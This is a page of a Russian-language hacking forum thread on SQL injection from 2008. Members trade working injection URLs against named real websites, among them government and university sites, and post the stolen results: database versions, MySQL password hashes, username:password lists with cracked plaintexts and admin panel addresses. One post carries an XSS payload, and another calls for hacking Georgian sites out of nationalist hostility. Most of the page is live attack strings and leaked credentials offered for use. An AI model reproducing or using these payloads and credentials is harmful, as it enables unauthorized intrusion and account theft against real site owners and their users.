SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 309 of 798
  1. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Грузинские Сайты в тему:

    http://www.tbilisi.gov.ge/index.php?Post=1%22%3E%20%3Cscript%3Ealert(/suki/)%3C/script%3E&sec_id=337&lang_id=DEU

    Aversi.ge
    Presa.ge
    5 ver. tables
    Ssa.gov.ge
    Flowers.ge
    Zona.ge
    5 ver tables...


    DVV-international.ge
    Group.ge
    5 ver. tables
    admin;1234


    Tvali.ge
    5 ver. tables
    Prschool.ge
    5 ver, tables..
    юзеры..
    admin.. но куда это все вводить я не искал..... язык не приемлев, а так кому интересно... смотрите.. если что в ПМ.

    Superfootball.ge
    5 ver. tabels
    Photo.ge
    все.. разкручивайте. ушел спать )
     
    #6161 sabe, 8 Aug 2008
    Last edited: 8 Aug 2008
  2. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    #6162 $n@ke, 8 Aug 2008
    1 person likes this.
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://orlandokids.org/latest_infoDetails.php?id=-21+union+select+1,concat_ws(char(58),version(),user(),database()),3,4/*
    Code:
    http://www.somachlaw.com/attorneys_bio.php?id=-12+union+select+1,2,3,concat_ws(char(58),version(),user(),database()),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
    Code:
    http://www.uplandsgallery.com/artists_details.php?id=-12+union+select+1,concat_ws(char(58),version(),user(),database()),3,4/*
    Code:
    http://www.screenroom.co.uk/php/id.asp?id=-1+union+select+1,2,user(),4,database(),version(),7,8,9,10,11,12,13--
    Code:
    http://www.alwg.cap.gov/index.php?menu=-90+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5/*
    Code:
    http://www.shoesandblues.com/lovesound/entry.php?id=-99999+union+select+1,2,concat(login,0x3a,password),4,5,6,7,8+from+users--
    Code:
    http://www.shoesandblues.com/lovesound/entry.php?id=-99999+union+select+1,2,concat(author,0x3a,password,0x3a,id),4,5,6,7,8+from+blog--
    Code:
    http://www.pogoda.ua/index.php?id=-1+union+select+1,concat_ws(0x3a,login,password,email),3,4,5+from+users/*
    Code:
    http://www.hcch.net/index_en.php?act=conventions.authorities&cid=-1+union+select+convert(concat_ws(0x3a,user,password)+using+latin1),2,3,4+from+mysql.user/*
     
    #6163 mailbrush, 8 Aug 2008
    4 people like this.
  4. WAR!9G

    WAR!9G Elder - Старейшина

    Joined:
    24 Jun 2007
    Messages:
    112
    Likes Received:
    89
    Reputations:
    1
    http://www.aprinkis.lv/?id=400284&topic=1+union+select+1,2/*

    VERSION: 4.0.22
    USER: root@localhost
    DATABASE: aprinkis

    http://www.aprinkis.lv/?id=400284&topic=1+union+select+1,user/**/from/**/mysql.user/*
    http://www.aprinkis.lv/?id=400284&topic=1+union+select+1,password/**/from/**/mysql.user/*

    adserver:3befcaeb54184d83
    birojutelpas:58ff6e1324b58e04
    root:3f138964071fc658
    andorraspeds:5ad72be31c9f299a
    arktika:5c9caec300d17c0b
    epicnic:62c1e60a26602275
    indrikis:14a77f346c38c1da
    irvarianti:676b813528fbb22e
    kandava:1989d36d632e3f9b
    leflatvia:5025123b461f063c
    mailtender:01d600067d94830a
    pirtslietas:79aa91e2338eebcf
    progress_cms:753915067ffa83cc
    progressolutions:54f03cad5ccd348b
    remifa:6117f28d007f5cbd
    riepuserviss:2fcf989a39cc6b42
    termorelax:32ccd0865fab861c
    tvaix:573cad0e0046f051
    vidzemestirgus:47150cec595393d6

    root: kandava
     
    #6164 WAR!9G, 8 Aug 2008
    1 person likes this.
  5. DTW

    DTW Banned

    Joined:
    11 May 2008
    Messages:
    221
    Likes Received:
    52
    Reputations:
    11
    Суши тоже уязвимы

    Суши тоже уязвимы
     
    #6165 DTW, 8 Aug 2008
    4 people like this.
  6. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    обед:
    Version:4.1.11-Debian_4sarge8
    Dbname:alaattindb
    User:alaattin@localhost

    jos_users

    http://ieee.metu.edu/alaattin/v3/administrator/
    видимо не та джумла)) а c v2 запоротая
     
    #6166 $n@ke, 8 Aug 2008
  7. WAR!9G

    WAR!9G Elder - Старейшина

    Joined:
    24 Jun 2007
    Messages:
    112
    Likes Received:
    89
    Reputations:
    1
    http://www.r25vsk.edu.lv/index.php?id=viensjauns&j=1+union+select+1,database(),version(),user(),5,6 ,7,8/*

    VERSION:5.0.22-Debian_0ubuntu6.06.3-log
    USER:am@localhost
    DATABASE:25vsk

    http://www.r25vsk.edu.lv/
    index.php?id=viensjauns&j=1+union+select+1,password,user,4,5,6,7,8/**/from/**/mysql.user/*

    root: 5055ba8907770700: kurmis
     
    #6167 WAR!9G, 8 Aug 2008
    Last edited: 8 Aug 2008
  8. St0nX

    St0nX Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    257
    Likes Received:
    46
    Reputations:
    0
    http://www.edu-soft.ru/?project_id=183'
     
    #6168 St0nX, 8 Aug 2008
  9. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Хм...странная какая-то БД ibase_query()
    Это чтоли InterBase из Делфи/C++,или я что-то путаю?
     
    #6169 DDoSька, 8 Aug 2008
  10. Art-Ge-Force

    Art-Ge-Force Member

    Joined:
    19 Apr 2008
    Messages:
    20
    Likes Received:
    5
    Reputations:
    0
    Code:
    http://e-bishkek.kg/banki_rash.php?public_id=-1+UNION+SELECT+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,User(),0x7873716C696E6A656E64),0x71),0x71),8,9,10,11,12,13
    Code:
    http://moda.kg/news.php?ify_id=-1+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,User(),0x7873716C696E6A656E64),0x71),0x71),5,6,7,8,9
     
    #6170 Art-Ge-Force, 8 Aug 2008
  11. WAR!9G

    WAR!9G Elder - Старейшина

    Joined:
    24 Jun 2007
    Messages:
    112
    Likes Received:
    89
    Reputations:
    1
    http://www.building.lv/rus/new/showcat.php?categ_id=1+union+select+1,2,3,4,5,6,7, 8,9,0/*

    VERSION: 5.0.45-log
    USER: lcweb@localhost
    DATABASE: building_rus

    http://www.building.lv/rus/new/showcat.php?categ_id=1+union+select+1,table_name,3 ,3,4,5,6,7,8,9/**/from/**/information_schema.tables/*
    http://www.building.lv/rus/new/showcat.php?
    categ_id=1+union+select+1,user,3,4,password,6,7,8,9,0/**/from/**/mysql.user/*

    root: 6601246238011F5DDCC92FE7E2DC2480C3B7472E
    espats: 2C1DDE601732FDE244C41F5936F2856E084B8930
    lcweb: DBD0FAA26B656A261DAEA8B6C9CB64790939B902
    alute: 8C14F4154F5AA0043EE9A778628C99FC45E14B4E
    heydi: 9A4E81B1B436F73677528AC6A14F1DED666DAEC8
    lba: 5D4C1BA3B3B50DDC2DE6A15FE7FA42D1F087036C
    dzesika: BF144F6F15E9306F96870A619280D5A6C325216B
    bioffice: 94A26D7830AAD43DD250F22A0C5F586BBE831B8E
    u_ariella: D1B375976DC8758E63F955D6607E293A1447BA3B
    madonna: F3859065922CFF8CB80C807994E6502A9F90737D
    gallery2: EFB96EC4C51BF221ADF8079902ADAF0B000BFB0D
    liene: 3A58B5CF1CE48C5882BA55D327DC670B202B010D
    simanft: 0A16657F20FA7E5EFE5152C3F5DB0D771B0D8F44
     
    #6171 WAR!9G, 8 Aug 2008
    1 person likes this.
  12. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    Хватит ***ней маяться, взламывайте грузинские сайты!!!

    http://www.opera.ge/

    HTML:
    http://www.opera.ge/eng/viewrepertoire.php?id=-25+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,username,password),20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+FROM+users+LIMIT+4,1/*&option=singleview
    Tako:10f8d20efd9cc9fa618b119d169c8591::899512388
    starwalker:7694f4a66316e53c8cdd9d9954bd611d::q
    karvasla12:2f820f87a9965071cb471f7b26ba2d1d::guliko
    tamuna:62596bf6973a46b5b67a22888d1de628:: patara
    pat_guia:45b5a7a07503a59bac2ce5193a564fb4::zarathustra
    ...

    HTML:
    http://www.opera.ge/eng/viewrepertoire.php?id=-25+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,password,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+FROM+admin/*&option=singleview
    admin:a3db0091856e81579ba5709797ed6058::bess001

    http://www.opera.ge/admin/
    (Пароль не подходит =\ )

    P.S. Не могу понять, боян или нет, но все равно выложил от чистого серца к России и от омерзения к Грузии ))
     
    #6172 ~EviL~, 9 Aug 2008
    Last edited: 9 Aug 2008
    1 person likes this.
  13. WAR!9G

    WAR!9G Elder - Старейшина

    Joined:
    24 Jun 2007
    Messages:
    112
    Likes Received:
    89
    Reputations:
    1
    http://kostanaylife.kz/index.php?pname=iass&type=17\'&view=1+union+select+1,2,3,4,5,6,7/*

    http://kostanaylife.kz/index.php?
    pname=iass&type=17\'&view=1+union+select+1,2,version(),4,user(),database(),7/*

    VERSION:4.1.22-log
    USER:t314kz_adminkl@localhost
    DATABASE:t314kz_dbKLNew
     
    #6173 WAR!9G, 9 Aug 2008
  14. Zircool

    Zircool Elder - Старейшина

    Joined:
    1 Mar 2006
    Messages:
    162
    Likes Received:
    37
    Reputations:
    5
    Сайт: www.museum.ge PR=5

     
    #6174 Zircool, 9 Aug 2008
    1 person likes this.
  15. WAR!9G

    WAR!9G Elder - Старейшина

    Joined:
    24 Jun 2007
    Messages:
    112
    Likes Received:
    89
    Reputations:
    1
    http://www.bar.lv/index.php?lang_id=5&categ_id=-1+union+select+1,2,3,4,5,6,7/*&op=search&search_type=4&sop=category

    VERSION:4.1.15-Debian_1ubuntu5-log
    USER:[email protected]
    DATABASE:c_bar

    http://www.bar.lv/index.php?lang_id=5&categ_id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(user
    (),0x71),0x71),5,6,7/*&op=search&search_type=4&sop=category
    http://www.bar.lv/index.php?lang_id=5&categ_id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(versi
    on(),0x71),0x71),5,6,7/*&op=search&search_type=4&sop=category
    http://www.bar.lv/index.php?lang_id=5&categ_id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(data
    base(),0x71),0x71),5,6,7/*&op=search&search_type=4&sop=category

    USERNAME: Sergey

    http://www.bar.lv/index.php?lang_id=5&categ_id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(usern ame,0x71),0x71),5,6,7/**/from/**/users/*&op=search&search_type=4&sop=category
     
    #6175 WAR!9G, 9 Aug 2008
    1 person likes this.
  16. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    inuitcircumpolar.com
    тИц = 30 PR = 5
    [​IMG]
    Таблицы:
    ------------------------------------------------------------------
    pixheaven.net
    тИц = 20 PR = 5
    Вот скуля,принтабельное поле - 7
    [​IMG]
    J\Очень интересно выводиться версия,но выводиться ограниченно =( то есть можно вывести только числовые значения
     
    #6176 DDoSька, 9 Aug 2008
    Last edited: 9 Aug 2008
  17. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    GOVядинка :rolleyes:
    http://www.dswd.gov.ph/
    тИц = 0 PR = 6
    [​IMG]
    Таблицы:
    отчет об ошибках выключен =\
    Все делал ручками :rolleyes: :rolleyes:
    ********************************************

    terrorfreetomorrow.org
    тИц = 20 PR = 0
    [​IMG]
    прикольно,все ошибки в алерте выводятсья)))
    [​IMG]

    Таблицы:
     
    #6177 DDoSька, 9 Aug 2008
    Last edited: 9 Aug 2008
    2 people like this.
  18. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Mai.ru - PR 7
    Nsa.gov.cn - PR 7
    таблы..
    Radiobremen.de - PR 7
    Studiocromie.org - PR 4
    5 ver. tables..
    Prefecturatimis.ro - PR 4
    Id-studio.info - PR 3
     
    #6178 sabe, 9 Aug 2008
    1 person likes this.
  19. WAR!9G

    WAR!9G Elder - Старейшина

    Joined:
    24 Jun 2007
    Messages:
    112
    Likes Received:
    89
    Reputations:
    1
    http://www.ezerzeme.lv/index.php?ln=ru&action=show&type=daily&eventid=1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13/*

    VERSION: 5.0.32-Debian_7etch5-log
    USER: web41_u1@localhost
    DATABASE: web41_db1

    http://www.ezerzeme.lv/index.php?ln=ru&action=show&type=daily&eventid=1'+union+select+1,passwd,3,4,5,6,7,8,9,10, 11,12,13/**/from/**/users/*

    http://www.ezerzeme.lv/index.php?ln=ru&action=show&type=daily&eventid=1'+union+select+1,name,3,4,5,6,7,8,9,10,11 ,12,13/**/from/**/users/*

    http://www.ezerzeme.lv/index.php?ln=ru&action=show&type=daily&eventid=1'+union+select+1,email,3,4,5,6,7,8,9,10,1 1,12,13/**/from/**/users/*
     
    #6179 WAR!9G, 9 Aug 2008
  20. Momiji

    Momiji Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    stpgov.org
    Code:
    http://www.stpgov.org/online_planning.php?cat=-6+union+select+1,2,3,concat_ws(0x3,version(),user(),database()),5,6,7,8,9,10,11,12/*
    4.1.20stpgov@localhostSTPGOV
    Code:
    http://www.stpgov.org/online_planning.php?cat=-6+union+select+1,2,3,concat_ws(0x3,email,password),5,6,7,8,9,10,11,12+from+users/*
    [email protected]JB1stpgova
    Админка: http://www.stpgov.org/admin/
     
    #6180 Momiji, 9 Aug 2008
(You must log in or sign up to post here.)
Page 309 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.